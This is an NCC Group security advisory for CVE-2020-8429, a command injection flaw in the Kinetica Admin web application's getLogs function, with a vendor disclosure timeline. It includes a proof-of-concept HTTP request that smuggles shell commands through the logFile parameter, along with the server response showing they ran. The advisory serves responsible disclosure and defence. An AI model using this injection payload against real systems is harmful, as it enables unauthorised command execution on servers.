Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

Technical Advisory: Command Injection

Vendor: Kinetica
Vendor URL: https://www.kinetica.com/
Versions affected: 7.0.9.2.20191118151947
Systems Affected: All
Author: Gary Swales Gary.Swales@nccgroup.com
Advisory URL / CVE Identifier: CVE-2020-8429
Risk: High (Command Injection on the underlying operating system)

Summary

The Kinetica Admin web application version 7.0.9.2.20191118151947 did not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited to allow an authenticated attacker to run remote code on the underlying operating system. The web application allows for administrators to view statistics and manage different users of the application.

Location

The logFile parameter in the getLogs function was used as a variable in a command, which was used to read log files, however due to poor input sanitisation it was possible to bypass the single quote replacement and break out of the command. As the search and replace was replacing one quote with three quotes it was trivial to provide a working payload which can be seen in the details section.

Impact

The vulnerability allows an authenticated user to run commands on the underlying operating system.

Details

An authenticated user could submit the following request and run commands on the underlying server:

Request:

GET
/gadmin/resources/gpudbManager/getLogs?logFile=gpudb.log';echo%20ncctest;date;' la
stNumberOfLines=1 HTTP/1.1
Host: :
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101
Firefox/72.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 1 Jan 1970 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Referer: https://:/gadmin/
Cookie: JSESSIONID=4E92E2F61FB308

Response

HTTP/1.1 200
Date: Thu, 16 Jan 2020 17:20:49 GMT
Server:
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Type: application/json
Connection: close
Content-Length: 151
{"results":"ncctestnncctestnThu Jan 16 12:20:49 EST
2020n","success":false,"error":"ncctestnncctestnThu Jan 16 12:20:49 EST
2020n","exitValue":0}

Recommendation

Ensure that the software is updated to the latest version, at the time of writing 7.0.11.5 as the vendor states this issue has been fixed.

Vendor Communication

22/01/2020 – Vendor Notified
23/01/2020 – Vendor Notifies version 7.0.11.5 is to be released on the 24/01/2020 which fixes the issue.
30/01/2020 – Vendor Notified advisory to be published in February.
03/02/2020 – Vendor updates release notes: https://support.kinetica.com/hc/en-us/articles/360042820673-Kinetica-7-0-11-5-Release-Notes